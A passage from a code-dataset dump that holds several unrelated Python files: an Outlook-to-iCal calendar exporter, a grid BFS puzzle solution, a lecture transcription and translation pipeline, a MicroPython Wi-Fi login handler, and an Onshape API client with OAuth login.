Inbox\r\n 9 Calendar\r\n 10 Contacts\r\n 11 Journal\r\n 12 Notes\r\n 13 Tasks\r\n 14 Drafts\r\n \r\n use print_all_email_boxes or print_all_default_folders\r\n '''\r\n\r\n def enable_verbose(self):\r\n self.verbose = True\r\n\r\n def print_all_email_boxes(self):\r\n ''' Print all email boxes.'''\r\n\r\n for i in range(50):\r\n try:\r\n box = self.nsoutlook.Folders(i)\r\n name = box.Name\r\n print(i, name)\r\n except:\r\n pass\r\n\r\n def print_all_default_folders(self):\r\n ''' Print all default folders.'''\r\n\r\n for i in range(50):\r\n try:\r\n box = self.nsoutlook.GetDefaultFolder(i)\r\n name = box.Name\r\n print(i, name)\r\n except Exception as e:\r\n print(\"Exception: %s\" % (str(e)))\r\n pass\r\n\r\n def send_meeting_request(self, to, subject, location, start_time, end_time, body_text, all_day=False):\r\n '''\r\n Create item im calendar\r\n\r\n Set myItem = myOlApp.CreateItem(olAppointmentItem)\r\n myItem.MeetingStatus = olMeeting\r\n myItem.Subject = \"Strategy Meeting\"\r\n myItem.Location = \"Conference Room B\"\r\n myItem.Start = #9/24/97 1:30:00 PM#\r\n myItem.Duration = 90\r\n '''\r\n\r\n appt = self.nslookup.CreateItem(\r\n c.olAppointmentItem) # https://msdn.microsoft.com/en-us/library/office/ff869291.aspx\r\n appt.MeetingStatus = c.olMeeting # https://msdn.microsoft.com/EN-US/library/office/ff869427.aspx\r\n\r\n # only after setting the MeetingStatus can we add recipients\r\n appt.Recipients.Add(to)\r\n appt.Subject = subject\r\n appt.Location = location\r\n\r\n appt.Start = start_time\r\n\r\n appt.AllDayEvent = all_day\r\n\r\n end_time_list = end_time.split(\"/\")\r\n end_time_list[-2] = str(int(end_time_list[-2]) + 1)\r\n appt.End = \"/\".join(end_time_list)\r\n\r\n appt.Body = body_text\r\n # appt.Save()\r\n # appt.Send()\r\n appt.Display()\r\n return True\r\n\r\n def remove_accents(self, str):\r\n \"\"\"\r\n Thanks to MiniQuark:\r\n http://stackoverflow.com/questions/517923/what-is-the-best-way-to-remove-accents-in-a-python-unicode-string/517974#517974\r\n \"\"\"\r\n\r\n nkfd_form = unicodedata.normalize('NFKD', unicode(str))\r\n return u\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])\r\n\r\n def remove_accents_bis(self, str):\r\n \"\"\"\r\n remove eszett char\r\n \"\"\"\r\n return str.replace('ß', 'ss')\r\n\r\n def get_my_calendar_event(self, start, end, recurence):\r\n\r\n icscal = Calendar()\r\n # master_recurrent_events_to_add = []\r\n known_guid_events = {}\r\n\r\n cal = self.nsoutlook.GetDefaultFolder(self.defaultCalendar)\r\n events = cal.Items\r\n\r\n # https://msdn.microsoft.com/en-us/library/office/gg619398.aspx\r\n events.Sort(\"[Start]\")\r\n print(\"REC: %s\" % (str(recurence)))\r\n events.IncludeRecurrences = (\"%s\" % (str(recurence)))\r\n\r\n # https://msdn.microsoft.com/EN-US/library/office/ff869427.aspx\r\n # Indicates the status of the meeting.\r\n # Name, Value, Description\r\n # olMeeting 1 The meeting has been scheduled.\r\n # olMeetingCanceled 5 The scheduled meeting has been cancelled.\r\n # olMeetingReceived 3 The meeting request has been received.\r\n # olMeetingReceivedAndCanceled 7 The scheduled meeting has been cancelled\r\n # but still appears on the user's calendar.\r\n # olNonMeeting 0 An Appointment item without attendees has been scheduled.\r\n # This status can be used to set up holidays on a calendar.\r\n\r\n # restrict by date\r\n restriction = (\"[Start] >= '%s' AND [End] < '%s'\" % (start, end))\r\n # restrict by date and type\r\n restriction = (\"([MeetingStatus] = 1 OR [MeetingStatus] = 3 OR [MeetingStatus] = 0) \"\r\n \" AND ([Start] >= '%s' AND [End] <= '%s')\"\r\n % (start, end))\r\n\r\n restricted_events = events.Restrict(restriction)\r\n\r\n for appointment_item in restricted_events:\r\n\r\n '''\r\n print(\"subj \" + appointment_item.Subject)\r\n if appointment_item.Location != \"\":\r\n print(\"loc \" + appointment_item.Location)\r\n print(\"start \" + str(appointment_item.StartUTC))\r\n print(\"end \" + str(appointment_item.EndUTC))\r\n print(\"allday \" + str(appointment_item.AllDayEvent))\r\n print(\"body \" + str(appointment_item.Body))\r\n print(\"busy \" + str(appointment_item.BusyStatus))\r\n print(\"cats \" + appointment_item.Categories)\r\n print(\"creationtime \" + str(appointment_item.CreationTime))\r\n print(\"duration \" + str(appointment_item.Duration))\r\n print(\"importance \" + str(appointment_item.Importance))\r\n print(\"recurring \" + str(appointment_item.IsRecurring))\r\n print(\"lastmod \" + str(appointment_item.LastModificationTime))\r\n print(\"recps \" + str(appointment_item.Recipients))\r\n print(\"recstate \" + str(appointment_item.RecurrenceState))\r\n print(\"reminderminb4 \" + str(appointment_item.ReminderMinutesBeforeStart))\r\n print(\"reqattendees \" + appointment_item.RequiredAttendees)\r\n print(\"\")\r\n print(\"\")\r\n '''\r\n if appointment_item.Subject == 'no meeting':\r\n continue\r\n if appointment_item.Subject == 'not available':\r\n continue\r\n if appointment_item.Subject == 'Daily meeting - update':\r\n continue\r\n\r\n event_to_add = True\r\n\r\n e = Event()\r\n e.name = appointment_item.Subject\r\n e.uid = appointment_item.EntryID\r\n e.created = appointment_item.CreationTime\r\n\r\n # TODO: need to fetched the recurrent attribute, as all meeting have the same UID.\r\n if appointment_item.IsRecurring:\r\n if not recurence:\r\n continue\r\n '''\r\n https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.olrecurrencestate?view=outlook-pia\r\n appointment_item.RecurrenceState\r\n olApptNotRecurring 0 The appointment is not a recurring appointment.\r\n olApptMaster 1 The appointment is a master appointment.\r\n olApptOccurrence 2 The appointment is an occurrence of a recurring appointment defined by a master appointment. \r\n olApptException 3 The appointment is an exception to a recurrence pattern defined by a master appointment.\r\n '''\r\n if self.verbose:\r\n print('recuring event name: ' + appointment_item.Subject +\r\n \" Date:\" + str(appointment_item.StartUTC) +\r\n \" State \" + str(appointment_item.RecurrenceState) +\r\n \" UID: \" + str(appointment_item.EntryID) +\r\n \" RecState \" + str(appointment_item.RecurrenceState))\r\n\r\n if recurence:\r\n recpat = appointment_item.GetRecurrencePattern()\r\n # print(recpat)\r\n print('Recurence StartDate: %s' % (str(recpat.PatternStartDate)))\r\n print('Recurence EndDate: %s' % (str(recpat.PatternEndDate)))\r\n print('Recurence StartTime: %s' % (str(recpat.StartTime)))\r\n print('Recurence EndTime: %s' % (str(recpat.EndTime)))\r\n print('Recurence Type %s' % (str(recpat.RecurrenceType)))\r\n '''\r\n https://docs.microsoft.com/en-us/office/vba/api/outlook.olrecurrencetype\r\n olRecursDaily 0 Represents a daily recurrence pattern.\r\n olRecursMonthly 2 Represents a monthly recurrence pattern.\r\n olRecursMonthNth 3 Represents a MonthNth recurrence pattern. See RecurrencePattern.Instance property.\r\n olRecursWeekly 1 Represents a weekly recurrence pattern.\r\n olRecursYearly 5 Represents a yearly recurrence pattern.\r\n olRecursYearNth 6 Represents a YearNth recurrence pattern. See RecurrencePattern.Instance property.\r\n '''\r\n print('------')\r\n\r\n if appointment_item.RecurrenceState != 1:\r\n # Store UID to fetch the master event...\r\n # if appointment_item.EntryID not in master_recurrent_events_to_add:\r\n # master_recurrent_events_to_add.append(appointment_item.EntryID)\r\n if recurence is False:\r\n event_to_add = False\r\n\r\n if event_to_add is False:\r\n continue\r\n\r\n if appointment_item.EntryID not in known_guid_events:\r\n known_guid_events[appointment_item.EntryID] = {}\r\n known_guid_events[appointment_item.EntryID]['count'] = 1\r\n known_guid_events[appointment_item.EntryID]['objects'] = []\r\n else:\r\n # if self.verbose:\r\n # print('Duplicate GUID detected: ' + str(appointment_item.EntryID))\r\n print(\r\n 'Duplicate GUID detected: ' + str(appointment_item.EntryID) + '\\n' + str(appointment_item.Subject))\r\n if recurence is False:\r\n delete(known_guid_events[appointment_item.EntryID])\r\n continue\r\n\r\n known_guid_events[appointment_item.EntryID]['count'] += 1\r\n\r\n if appointment_item.AllDayEvent is True:\r\n # For full day event, this is is stored in localtime in outlook and not UTC...\r\n # so start date is day - 1 and not day.\r\n # print('Is all day: Subject: %s' % (appointment_item.Subject))\r\n\r\n from_zone = tz.tzutc()\r\n to_zone = tz.tzlocal()\r\n utc = parse(str(appointment_item.StartUTC))\r\n utc = utc.astimezone(to_zone)\r\n utc = str(utc).split('+')[0]\r\n e.begin = utc\r\n e.make_all_day()\r\n\r\n else:\r\n e.begin = appointment_item.StartUTC\r\n e.end = appointment_item.EndUTC\r\n # e.duration = appointment_item.Duration\r\n\r\n body_detect = chardet.detect(appointment_item.Body.encode('utf-8'))\r\n if body_detect['encoding'] == 'ascii':\r\n e.description = appointment_item.Body\r\n elif body_detect['encoding'] is None:\r\n e.description = appointment_item.Body\r\n elif body_detect['encoding'] == 'utf-8':\r\n e.description = appointment_item.Body.encode('utf-8').decode('utf-8', 'ignore')\r\n elif body_detect['encoding'] == 'ISO-8859-1':\r\n e.description = appointment_item.Body.encode('utf-8').decode('iso-8859-1', 'ignore')\r\n elif body_detect['encoding'] == 'ISO-8859-15':\r\n e.description = appointment_item.Body.decode('iso8859_15', 'ignore')\r\n elif body_detect['encoding'] == 'Windows-1252':\r\n try:\r\n e.description = appointment_item.Body.decode('windows-1252', 'ignore')\r\n except Exception as err:\r\n # e.description = ''\r\n e.description = appointment_item.Body\r\n print('Unknown encoding: %s' % (body_detect))\r\n print('Exception: %s' % (str(err)))\r\n print('Subject: %s' % (appointment_item.Subject))\r\n else:\r\n print('Unknown encoding: %s' % (body_detect))\r\n e.description = ''\r\n e.description = e.description.replace('\\r', '')\r\n\r\n if appointment_item.Location != \"\":\r\n e.location = appointment_item.Location\r\n\r\n # TODO: Alarm\r\n # TODO print(\"reminderminb4 \" + str(appointment_item.ReminderMinutesBeforeStart))\r\n\r\n if event_to_add:\r\n icscal.events.add(e)\r\n\r\n known_guid_events[e.uid]['objects'].append(e)\r\n\r\n # if self.verbose:\r\n # for event in master_recurrent_events_to_add:\r\n # print('need to fetch master event with uid:' + str(event))\r\n\r\n return (icscal.events, known_guid_events)\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.exit(0)\r\n","repo_name":"LittleKaosLilly/outlook2caldav","sub_path":"lib/myoutlook.py","file_name":"myoutlook.py","file_ext":"py","file_size_in_byte":13824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43980174931","text":"from collections import deque\n\nN = int(input())\n\ndr = [0, 1, 0, -1]\ndc = [1, 0, -1, 0]\nanswer = int(1e9)\n\ngraph = []\nvisited = [[False for i in range(N)] for j in range(N)]\nfor i in range(N):\n graph.append(list(map(int, input().split())))\n\nnum = 1\nfor row in range(N):\n for col in range(N):\n if visited[row][col]:\n continue\n if graph[row][col] == 0:\n continue\n q = deque()\n q.append((row, col, num))\n visited[row][col] = True\n graph[row][col] = num\n while q:\n c_row, c_col, c_num = q.popleft()\n for i in range(4):\n n_row = c_row + dr[i]\n n_col = c_col + dc[i]\n if n_row < 0 or n_col < 0 or n_row >= N or n_col >= N:\n continue\n if visited[n_row][n_col]:\n continue\n if graph[n_row][n_col] == 0:\n continue\n\n graph[n_row][n_col] = num\n visited[n_row][n_col] = True\n q.append((n_row, n_col, c_num))\n num += 1\n\n\nfor row in range(N):\n for col in range(N):\n if graph[row][col] == 0:\n continue\n\n q = deque()\n visited = [[False for i in range(N)] for j in range(N)]\n num = graph[row][col]\n q.append((row, col, 0))\n\n while q:\n c_row, c_col, dist = q.popleft()\n for i in range(4):\n n_row = c_row + dr[i]\n n_col = c_col + dc[i]\n if n_row < 0 or n_col < 0 or n_row >= N or n_col >= N:\n continue\n if visited[n_row][n_col]:\n continue\n if graph[n_row][n_col] == num: # 원래 섬으로 돌아온경우\n continue\n if graph[n_row][n_col] != num and graph[n_row][n_col] != 0:\n answer = min(answer, dist)\n\n visited[n_row][n_col] = True\n q.append((n_row, n_col, dist+1))\n\nprint(answer)\n","repo_name":"pickac4rd/boj","sub_path":"2146.py","file_name":"2146.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5833529721","text":"from . import workers\nimport zipfile, os, tempfile, subprocess, re, traceback\nimport operator\nfrom datetime import datetime, timedelta\n\ndef convert_to_wav(source, ext):\n\n with tempfile.NamedTemporaryFile(mode='w+b', suffix=ext) as sourcefile, \\\n tempfile.NamedTemporaryFile(mode='r+b', suffix='.wav') as resultfile:\n\n sourcefile.write(source)\n\n command = ['ffmpeg', '-nostdin', '-y', '-i', sourcefile.name, '-acodec', 'pcm_s16le', '-ar', '16000', '-ac', '1', resultfile.name]\n p = subprocess.run(command, text=True, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n return (resultfile.read(), '---STDOUT---\\n' + p.stdout + '\\n---STDERR---\\n' + p.stderr, )\n\n\ndef segment_audio(audio, name):\n \n with tempfile.NamedTemporaryFile(mode='w+b', suffix='.wav') as sourcefile, \\\n tempfile.NamedTemporaryFile(mode='r+', suffix='.seg') as resultfile:\n\n sourcefile.write(audio)\n\n command = ['./worker_scripts/segment_audio.sh', sourcefile.name, resultfile.name, name]\n p = subprocess.run(command, text=True, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n return (resultfile.read(), '---STDOUT---\\n' + p.stdout + '\\n---STDERR---\\n' + p.stderr, )\n\ndef format_seg_as_stm(segmentation):\n\n #TODO is sorting really necessary or is seg already in order\n\n\n dic = {}\n for line in segmentation.splitlines():\n name0, name1, start_str, end_str = line.split()\n start = float(start_str)\n end = float(end_str)\n dic[start] = f'{name0}_{int(start*100):07}_{int(end*100):07} {name1} {start:.2f} {end:.2f}\\n'\n \n result = [ line for _, line in sorted(dic.items()) ]\n\n return ''.join(result)\n\n\ndef stm_to_vtt_time(time):\n td = timedelta( seconds=round(float(time), 3) )\n #dummy date, important is the time 00:00:00.000000\n time = datetime(1970, 1, 1)\n #we need the datetime, since time + timedelta isn't supported\n time += td\n time = time.time()\n return time.isoformat('milliseconds')\n\ndef set_to_vtt(text):\n result = \"WEBVTT \\n\\n\"\n log = \"\"\n for line in text.splitlines():\n line = line.strip() \n try:\n start, end, *hypo = line.split()\n except ValueError:\n log += f'badly formatted line {line}'\n continue\n hypo = ' '.join(hypo)\n start = stm_to_vtt_time(start)\n end = stm_to_vtt_time(end)\n result += f\"{start} --> {end} \\n\"\n result += hypo + \"\\n\\n\"\n\n return result, log\n\n\ndef run_workers(task):\n\n task.status = task.PROCESSING\n task.save()\n\n #TODO reading the whole file to pass it to workers might cause memory issues\n with task.source.open('rb') as src_file, task.result.open('wb') as res_file, task.log.open('wb') as log_file:\n with zipfile.ZipFile(src_file, 'r') as src_zip, zipfile.ZipFile(res_file, 'w') as res_zip, zipfile.ZipFile(log_file, 'w') as log_zip:\n for filename in src_zip.namelist():\n\n try:\n\n source = src_zip.read(filename)\n folder, ext = os.path.splitext(filename)\n\n #Convert\n audio, log = convert_to_wav(source, ext)\n res_zip.writestr(f'{folder}/audio.wav', audio)\n log_zip.writestr(f'{folder}/convert_audio.log', log)\n print('Conversion done')\n\n #Segmentation\n segmentation, log = segment_audio(audio, folder)\n res_zip.writestr(f'{folder}/segmentation.txt', segmentation)\n log_zip.writestr(f'{folder}/segment_audio.log', log)\n print('Segmentation done')\n\n #ToSTM\n segmentation = format_seg_as_stm(segmentation)\n res_zip.writestr(f'{folder}/segmentation.stm', segmentation)\n print('STM Done')\n\n #ASR\n text, log, *additional = workers.asr_worker(audio, segmentation, task.language)\n res_zip.writestr(f'{folder}/transcript.txt', text)\n log_zip.writestr(f'{folder}/transcribe_audio.log', log)\n print('ASR done')\n\n #ToVtt\n try:\n vtt, log = set_to_vtt(text)\n res_zip.writestr(f'{folder}/transcript.vtt', vtt)\n log_zip.writestr(f'{folder}/text_to_vtt.log', log)\n except Exception:\n log_zip.writestr(f'{folder}/text_to_vtt.log', traceback.format_exc())\n print('Vtt done')\n\n #MT\n if task.translations:\n for code, translation, log in workers.mt_worker(text, task.language, task.translations, source, segmentation, *additional):\n res_zip.writestr(f'{folder}/translation_{code}.txt', translation)\n log_zip.writestr(f'{folder}/translate_to_{code}.log', log)\n print('MT done')\n\n except Exception:\n log_zip.writestr(f'{folder}/error.log', traceback.format_exc())\n\n task.status = task.DONE\n task.save()\n","repo_name":"Doomse/Lecture_Translator","sub_path":"LT_UI/tasks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1042432584","text":"from App import ConfApp\nfrom Inc.ApiParse import QueryToDict\nfrom IncP.Util.UHrd import Reset\n\n\nasync def DoUrl(aParent, aReader: asyncio.StreamReader, aWriter: asyncio.StreamWriter, aHead: dict):\n LenData = int(aHead.get('content-length', '0'))\n if (LenData > 0):\n R = 'about to reboot'\n\n Data = await aReader.read(LenData)\n Query = QueryToDict(Data.decode('utf-8'))\n ConfApp['STA_ESSID'] = Query.get('_STA_ESSID')\n ConfApp['STA_Paswd'] = Query.get('_STA_Paswd')\n ConfApp.Save()\n\n Reset()\n else:\n R = 'No data'\n\n await aParent.Answer(aWriter, 200, 'txt', R)\n","repo_name":"VladVons/mpy-vRelay","sub_path":"src/App/HttpSrv/p_login.py","file_name":"p_login.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74456440144","text":"import omni\nimport carb\nimport weakref\nimport gc\n\ntry:\n # from onshape_client import Client\n # import onshape_client\n from omni.isaac.onshape.onshape_client import Client\n import omni.isaac.onshape.onshape_client as onshape_client\nexcept ImportError:\n carb.log_warn(\"onshape dependencies not found. attempting to install...\")\n # the package name and module names are different, so install at runtime and ignore the import check.\n omni.kit.pipapi.install(\n \"requests-oauthlib\", version=\"1.3.0\", extra_args=[\"--no-dependencies\"], ignore_import_check=True\n )\n omni.kit.pipapi.install(\"ruamel.yaml\", version=\"0.17.16\", extra_args=[\"--no-dependencies\"])\n # this module cannot be directly imported\n omni.kit.pipapi.install(\n \"ruamel.yaml.clib\", version=\"0.2.6\", extra_args=[\"--no-dependencies\"], ignore_import_check=True\n )\n omni.kit.pipapi.install(\"nulltype\", version=\"2.3.1\", extra_args=[\"--no-dependencies\"])\n # omni.kit.pipapi.install(\"onshape_client\", version=\"1.6.3\", extra_args=[\"--no-dependencies\"])\n # from onshape_client import Client\n # import onshape_client\n from omni.isaac.onshape.onshape_client import Client\n import omni.isaac.onshape.onshape_client as onshape_client\n\nimport omni.ui as ui\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport json\n\nimport webbrowser\nfrom urllib.parse import urlparse, parse_qs\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nfrom threading import Lock\n\n\nclass TimeoutException(Exception):\n pass\n\n\nfrom .scripts.definitions import (\n USE_ONSHAPE_KEY,\n DEFAULT_ONSHAPE_KEY,\n DEFAULT_ONSHAPE_SECRET,\n ONSHAPE_BASE_URL,\n ONSHAPE_AUTH_URL,\n ONSHAPE_TOKEN_URL,\n)\n\n\n# class ThreadWithException(threading.Thread):\n# def __init__(self, bucket):\n# threading.Thread.__init__(self)\n\n\ndef set_api_keys(key, secret):\n carb.settings.get_settings().set(DEFAULT_ONSHAPE_KEY, key)\n carb.settings.get_settings().set(DEFAULT_ONSHAPE_SECRET, secret)\n\n\ndef do_auth():\n try:\n d = OnshapeClient.get().documents_api.get_documents()\n if d:\n OnshapeClient.set_authenticated(True)\n\n except Exception as e:\n carb.log_error(\"Onshape Authentication Error: {}\".format(e))\n OnshapeClient.__stop_request = True\n return False\n\n\ndef callback(q=None):\n OnshapeClient.auth_callback()\n\n\nclass AuthWindow(ui.Widget):\n def __init__(self, parent):\n self.parent = parent\n self.executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix=\"onshape_authentitator_pool\")\n\n self.build_widget()\n\n def start_auth(self, callback_fn):\n # Process(target = auth_method, args=(self.queue,))\n\n OnshapeClient.__stop_request = False\n OnshapeClient.set_auth_callback(lambda a=self, c=callback_fn: a.done_auth(c))\n self.task = self.executor.submit(do_auth)\n\n self.task.add_done_callback(callback)\n # do_auth(OnshapeClient.get())\n # callback(0)\n\n def build_widget(self):\n with ui.VStack(alignment=(ui.Alignment.CENTER)):\n ui.Label(\"Onshape Authentication in Progress\", alignment=(ui.Alignment.CENTER))\n self.cancel_btn = ui.Button(\"Cancel\", clicked_fn=lambda: weakref.proxy(self).cancel_auth())\n ui.Spacer(height=5)\n\n def cancel_auth(self):\n # self.process.terminate()\n self.parent.visible = False\n OnshapeClient.__stop_request = True\n OnshapeClient.stop_httpServer()\n # for pid, process in self.executor._processes.items():\n # process.terminate()\n self.executor.shutdown(wait=False)\n OnshapeClient.set_auth_callback(None)\n # self.queue.put(False)\n\n def done_auth(self, callback):\n # r = self.queue.get()\n # done = False\n # if len(r) > 1:\n # done = r[1]\n self.parent.visible = False\n if OnshapeClient.is_authenticated():\n callback(True)\n\n def __del__(self):\n self.cancel_auth()\n\n\nclass OnshapeAuthServer(BaseHTTPRequestHandler):\n code = None\n state = None\n params = None\n\n def do_GET(self):\n try:\n parsed_url = urlparse(self.path)\n OnshapeAuthServer.params = self.path.split(\" \")[-1]\n qs = parse_qs(parsed_url.query)\n if \"code\" in qs:\n OnshapeAuthServer.code = qs[\"code\"][0]\n if \"state\" in qs:\n OnshapeAuthServer.state = qs[\"state\"][0]\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(bytes(\"Onshape Importer: Succes\", \"utf-8\"))\n self.wfile.write(bytes(\"\", \"utf-8\"))\n self.wfile.write(\n bytes(\n \"

You have successfully authorized access to your Onshape account.
You can continue to work in your application.

\",\n \"utf-8\",\n )\n )\n OnshapeClient.set_authenticated(True)\n OnshapeClient.set_handled_request(True)\n self.wfile.write(bytes(\"\", \"utf-8\"))\n except Exception as e:\n carb.log_error(\"Error handling auth callback GET: \" + str(e))\n\n def log_message(self, format, *args):\n return\n\n\nclass OnshapeClient(object):\n __onshape_client = None\n __user_mats_lib = None\n __authenticated = False\n __auth_callback = False\n __lock = Lock()\n __webServer = None\n __stop_request = False\n __handled_request = False\n __cleared_client = False\n\n @staticmethod\n def set_handled_request(value):\n OnshapeClient.__handled_request = value\n\n @staticmethod\n def is_authenticated():\n return OnshapeClient.__authenticated\n\n @staticmethod\n def createHttpServer(hostname, serverPort):\n if OnshapeClient.__webServer:\n OnshapeClient.stop_httpServer()\n\n OnshapeClient.__webServer = HTTPServer((hostname, serverPort), OnshapeAuthServer)\n\n return OnshapeClient.__webServer\n\n @staticmethod\n def get_httpServer():\n return OnshapeClient.__webServer\n\n @staticmethod\n def stop_httpServer():\n if OnshapeClient.__webServer:\n # time.sleep(3)\n OnshapeClient.__webServer.server_close()\n OnshapeClient.__webServer = None\n\n @staticmethod\n def set_auth_callback(callback):\n OnshapeClient.__auth_callback = callback\n\n @staticmethod\n def set_authenticated(auth):\n OnshapeClient.__authenticated = auth\n\n @staticmethod\n def clear_client():\n if OnshapeClient.__onshape_client:\n OnshapeClient.__onshape_client = None\n del Client.singleton_instace\n Client.clear_client()\n OnshapeClient.__cleared_client = True\n gc.collect()\n\n @staticmethod\n def auth_callback():\n ret = None\n if OnshapeClient.__auth_callback:\n ret = OnshapeClient.__auth_callback()\n OnshapeClient.__auth_callback = None\n return ret\n\n @staticmethod\n def get_oauth_client():\n hostName = \"localhost\"\n serverPort = 4518\n # ID and secret are naming conventions, this is not treated as a secret\n client_id = \"7XVZWE3MDZOCYSXEXUJLN4LNHADB42ASGPUPV6Y=\"\n client_secret = \"QZIMKKPIZYQO473R72QEU333XY33NSOXSOMMRUOJQ7HEHRDSPMBA====\"\n\n def auth_callback(url, fetch_token):\n # print(\"Auth callback\")\n if not OnshapeClient.__stop_request:\n qs = parse_qs(urlparse(url).query)\n state = None\n if \"state\" in qs:\n state = qs[\"state\"][0]\n webServer = OnshapeClient.createHttpServer(hostName, serverPort)\n # Credentials you get from registering a new application\n\n webbrowser.get().open(url)\n webServer.timeout = 1\n OnshapeClient.__handled_request = False\n while not (OnshapeClient.__handled_request or OnshapeClient.__stop_request):\n webServer.handle_request()\n\n webServer.server_close()\n if OnshapeClient.__handled_request and OnshapeAuthServer.params and not OnshapeClient.__stop_request:\n # thread = threading.Thread(target=webServer.handle_request)\n # thread.run()\n if state == OnshapeAuthServer.state:\n code = OnshapeAuthServer.code\n response_uri = \"https://{}:{}/oauth-redirect{}\".format(\n hostName, serverPort, OnshapeAuthServer.params[1:]\n )\n # print(response_uri)\n Client.get_client().set_grant_authorization_url_response(response_uri)\n # else:\n # response_uri = \"https://{}:{}/oauth-redirect\".format(hostName, serverPort)\n # try:\n # Client.get_client().set_grant_authorization_url_response(response_uri)\n # except Exception:\n # carb.log_warn(\"cancelled auth\")\n # fetch_token()\n\n # except Exception as e:\n # OnshapeClient.__stop_request = True\n # carb.log_error(\"error attempting to open Onshape Authentication: \" + str(e))\n\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n OnshapeClient.__onshape_client = Client(\n keys_file=None,\n open_authorize_grant_callback=auth_callback,\n configuration={\n \"client_id\": client_id,\n \"client_secret\": client_secret,\n \"base_url\": base_url,\n \"host\": base_url,\n \"oauth_authorization_method\": \"python_callback\",\n \"pool_connections\": 100,\n \"pool_maxsize\": 10000,\n \"connection_pool_maxsize\": 10000,\n },\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n\n @staticmethod\n def authenticate(authenticated_callback):\n OnshapeClient.get()\n if not OnshapeClient.__authenticated:\n auth_popup = ui.Window(\n \"Onshape Authentication\",\n width=300,\n height=50,\n flags=ui.WINDOW_FLAGS_NO_RESIZE\n | ui.WINDOW_FLAGS_NO_SCROLLBAR\n | ui.WINDOW_FLAGS_NO_TITLE_BAR\n | ui.WINDOW_FLAGS_MODAL,\n )\n\n def callback(authenticated):\n if authenticated:\n OnshapeClient.__authenticated = True\n authenticated_callback()\n\n with auth_popup.frame:\n window = AuthWindow(auth_popup)\n # window.queue.put(OnshapeClient.get())\n window.start_auth(callback)\n return OnshapeClient.__authenticated\n\n @staticmethod\n def get():\n with OnshapeClient.__lock:\n if not OnshapeClient.__onshape_client:\n if Client.singleton_instance:\n OnshapeClient.__onshape_client = onshape_client.client.get_client()\n else:\n use_api_key = carb.settings.get_settings().get(USE_ONSHAPE_KEY)\n api_key = carb.settings.get_settings().get(DEFAULT_ONSHAPE_KEY)\n api_secret = carb.settings.get_settings().get(DEFAULT_ONSHAPE_SECRET)\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n auth_url = carb.settings.get_settings().get(ONSHAPE_AUTH_URL)\n token_url = carb.settings.get_settings().get(ONSHAPE_TOKEN_URL)\n if use_api_key and api_key and api_secret:\n OnshapeClient.__onshape_client = Client(\n keys_file=None,\n configuration={\n \"access_key\": api_key,\n \"secret_key\": api_secret,\n \"base_url\": base_url,\n \"host\": base_url,\n \"authorization_uri\": auth_url,\n \"token_uri\": token_url,\n },\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n OnshapeClient.__authenticated = True\n else:\n if OnshapeClient.__cleared_client:\n OnshapeClient.__onshape_client = Client(\n keys_file=None, configuration={\"base_url\": base_url}\n )\n OnshapeClient.__onshape_client.configuration.host = base_url\n OnshapeClient.__cleared_client = False\n OnshapeClient.get_oauth_client()\n\n # Override the API accept map to workaround the API bug\n OnshapeClient.__onshape_client.assemblies_api.get_features.headers_map[\"accept\"] = [\n \"application/vnd.onshape.v1+json;charset=UTF-8;qs=0.1\"\n ]\n # print(OnshapeClient.__onshape_client.get_client().configuration.host)\n return OnshapeClient.__onshape_client.get_client()\n\n @staticmethod\n def get_material_library(did, eid):\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n url = \"{}/api/materials/libraries/d/{}/e/{}\".format(base_url, did, eid)\n r = OnshapeClient.get().api_client.request(\"GET\", url, _preload_content=False, query_params={})\n if r.status == 200:\n return json.loads(r.data)\n return False\n\n @staticmethod\n def get_default_material_library():\n return OnshapeClient.get_material_library(\"2718281828459eacfeeda11f\", \"6bbab304a1f64e7d640a2d7d\")\n\n @staticmethod\n def get_default_material_libraries(update=False):\n if update or not OnshapeClient.__user_mats_lib:\n user_settings = OnshapeClient.get().users_api.get_user_settings_current_logged_in_user()\n libraries = user_settings[\"material_library_settings\"]\n OnshapeClient.__user_mats_lib = [\n OnshapeClient.get_material_library(libs[\"document_id\"], libs[\"element_id\"])\n for libs in libraries[\"libraries\"] + libraries[\"company_libraries\"]\n ]\n return OnshapeClient.__user_mats_lib\n\n @staticmethod\n def update_metadata(did, wdid, wid, eid, pid, body):\n base_url = carb.settings.get_settings().get(ONSHAPE_BASE_URL)\n url = \"{}/api/metadata/d/{}/{}/{}/e/{}/p/{}\".format(base_url, did, wdid, wid, eid, pid)\n headers = {\n \"accept\": \"application/vnd.onshape.v1+json;charset=UTF-8;qs=0.1\",\n \"Content-Type\": \"application/json;charset=UTF-8; qs=0.09\",\n \"content-length\": str(len(body)),\n }\n r = OnshapeClient.get().api_client.request(\n method=\"POST\", url=url, body=json.loads(body), headers=headers, _preload_content=False, query_params={}\n )\n return r\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.onshape/omni/isaac/onshape/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22472632319","text":"import sys\n\nc = 0\ndata = [i.split('\\t') for i in map(str.strip, sys.stdin)]\n\nfor i in 